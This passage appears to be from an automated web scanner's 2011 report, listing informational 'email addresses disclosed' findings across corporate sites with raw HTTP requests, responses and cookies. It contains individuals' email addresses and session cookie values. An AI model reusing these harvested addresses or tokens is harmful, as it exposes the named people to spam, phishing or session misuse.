User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.5.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<a href="mailto:info@shavlik.com">info@shavlik.com</a>
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...

25.10. http://mail.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The following email addresses were disclosed in the response:

--Rating@Mail.ru
Rating@Mail.ru

Request

Response

25.11. http://solutions.kronos.com/forms/experience2011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.kronos.com
Path:	/forms/experience2011

Issue detail

The following email addresses were disclosed in the response:

Carol.Nowakowski@kronos.com
Nandini.Sen@kronos.com

Request

Response

25.12. http://tengrinews.kz/static/js/browserTouchSupport.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/static/js/browserTouchSupport.js

Issue detail

The following email address was disclosed in the response:

jeff@tropicalpixels.com

Request

GET /static/js/browserTouchSupport.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:48 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Tue, 22 Feb 2011 05:08:59 GMT
ETag: "be08b-a10-49cd7fa5ad0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2576

/*
* jQuery touch and gesture detection.
*
* identifies support for touch and gestures.
*
* Usage:
*
* if ($fn.browserTouchSupport.touches) {
* // Touch specific interactions
* }
*
...[SNIP]...
<jeff@tropicalpixels.com>
...[SNIP]...

25.13. http://tengrinews.kz/static/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tengrinews.kz
Path:	/static/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /static/js/jquery.cookie.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Mon, 01 Nov 2010 19:25:45 GMT
ETag: "be2e6-1096-49402c652c040"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.14. http://tools.manageengine.com/forums/me/forum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/me/forum.php

Issue detail

The following email addresses were disclosed in the response:

nfs@manageengine.com
opmanager-support@manageengine.com
opmanger-support@manageengine.com

Request

GET /forums/me/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/meforum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='mailto:opmanger-support@manageengine.com' target='_blank'>opmanger-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:opmanager-support@manageengine.com' target='_blank'>opmanager-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:nfs@manageengine.com' target='_blank'>nfs@manageengine.com<\/a>
...[SNIP]...

25.15. http://tools.manageengine.com/forums/security-manager/forum.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.manageengine.com
Path:	/forums/security-manager/forum.php

Issue detail

The following email addresses were disclosed in the response:

Support@servicedeskplus.com
securitymanagerplus-support@manageengine.com

Request

GET /forums/security-manager/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a href='mailto:Support@servicedeskplus.com' target='_blank'>Support@servicedeskplus.com<\/a>
...[SNIP]...
<a href='mailto:securitymanagerplus-support@manageengine.com' target='_blank'>securitymanagerplus-support@manageengine.com<\/a>
...[SNIP]...

25.16. http://www.criticalwatch.com/company/critical-watch-career.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/critical-watch-career.aspx

Issue detail

The following email address was disclosed in the response:

employment@criticalwatch.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:employment@criticalwatch.com" class="content_menulink"><img src="../images/email.gif" width="40" height="38" align="absmiddle" />employment@criticalwatch.com</a>
...[SNIP]...

25.17. http://www.criticalwatch.com/company/critical-watch-contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/company/critical-watch-contact.aspx

Issue detail

The following email address was disclosed in the response:

info@criticalwatch.com

Request

Response

25.18. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/products/vulnerability-management-ips.aspx

Issue detail

The following email address was disclosed in the response:

tippingpoint@criticalwatch.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:tippingpoint@criticalwatch.com" class="color-gold">tippingpoint@criticalwatch.com</a>
...[SNIP]...

25.19. http://www.criticalwatch.com/support/critical-watch-support.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criticalwatch.com
Path:	/support/critical-watch-support.aspx

Issue detail

The following email address was disclosed in the response:

support@criticalwatch.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:support@criticalwatch.com" class="content_menulink">support@criticalwatch.com</a>
...[SNIP]...

25.20. http://www.depthsecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.depthsecurity.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

Response

25.21. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.depthsecurity.com
Path:	/issa-kc-12-2009-presentation.aspx

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

GET /issa-kc-12-2009-presentation.aspx HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.depthsecurity.com/?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.1.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6488
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.22. https://www.depthsecurity.com/company.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/company.aspx

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

GET /company.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5736
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.23. https://www.depthsecurity.com/contact-us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/contact-us.aspx

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

GET /contact-us.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11987
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
</h3>
info@depthsecurity.com
</div>
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.24. https://www.depthsecurity.com/professional-services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/professional-services.aspx

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

GET /professional-services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/services.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6397
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.25. https://www.depthsecurity.com/services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.depthsecurity.com
Path:	/services.aspx

Issue detail

The following email address was disclosed in the response:

info@depthsecurity.com

Request

GET /services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/company.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6794
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...

25.26. http://www.gartner.com/technology/contact/become-a-client.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/technology/contact/become-a-client.jsp

Issue detail

The following email addresses were disclosed in the response:

--sales.lead@gartner.com
sales.lead@gartner.com

Request

GET /technology/contact/become-a-client.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733487556:ss=1303732853510; UnicaID=EaMj78Ff3mr-W7FK0tG; __utmz=256913437.1303733488.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256913437.2022865609.1303733488.1303733488.1303733488.1; __utmc=256913437; __utmb=256913437.1.10.1303733488

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:27 GMT
ETag: "pvbd35e8d8926582dc26975fcff5279ead"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U277869E6].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 32000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>

<title>Become a Client</title>

...[SNIP]...
<input type="hidden" name="recipient" value="sales.lead@gartner.com ">
...[SNIP]...

25.27. http://www.gartner.com/technology/contact/contact_gartner.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gartner.com
Path:	/technology/contact/contact_gartner.jsp

Issue detail

The following email addresses were disclosed in the response:

apac_privacy.officer@gartner.com
emea.privacyofficer@gartner.com
help@gartner.com
info@amstock.com
inquiry@gartner.com
investor.relations@gartner.com
jp.vendorbriefings@gartner.com
ombudsman@gartner.com
privacy.officer@gartner.com
vendor.briefings@gartner.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>

<!-- Changes to title and meta tags
...[SNIP]...
<a href="mailto:inquiry@gartner.com">inquiry@gartner.com</a>
...[SNIP]...
<a href="mailto:help@gartner.com">help@gartner.com</a>
...[SNIP]...
<a href="mailto:investor.relations@gartner.com">investor.relations@gartner.com</a>
...[SNIP]...
<a href="mailto:info@amstock.com">info@amstock.com</a>
...[SNIP]...
<a href="mailto:ombudsman@gartner.com">ombudsman@gartner.com</a>
...[SNIP]...
<a href="mailto:vendor.briefings@gartner.com">
...[SNIP]...
<a href="mailto:jp.vendorbriefings@gartner.com">
...[SNIP]...
<a href="mailto:privacy.officer@gartner.com">privacy.officer@gartner.com</a>
...[SNIP]...
<a href="mailto:emea.privacyofficer@gartner.com">emea.privacyofficer@gartner.com</a>
...[SNIP]...
<a href="mailto:apac_privacy.officer@gartner.com">apac_privacy.officer@gartner.com</a>
...[SNIP]...

25.28. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kronos.com
Path:	/kronos-site-usage-privacy-policy.aspx

Issue detail

The following email address was disclosed in the response:

webmaster@kronos.com

Request

GET /kronos-site-usage-privacy-policy.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 59619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<a href="mailto:webmaster@kronos.com">webmaster@kronos.com</a>
...[SNIP]...

25.29. http://www.manageengine.com/me_partners.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manageengine.com
Path:	/me_partners.html

Issue detail

The following email addresses were disclosed in the response:

dragon@kisang.co.kr
mpark@kisang.co.kr
prasad@gammainfowayexalt.com
rino@itinfosec.com
sales@itinfosec.com
support@itinfosec.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
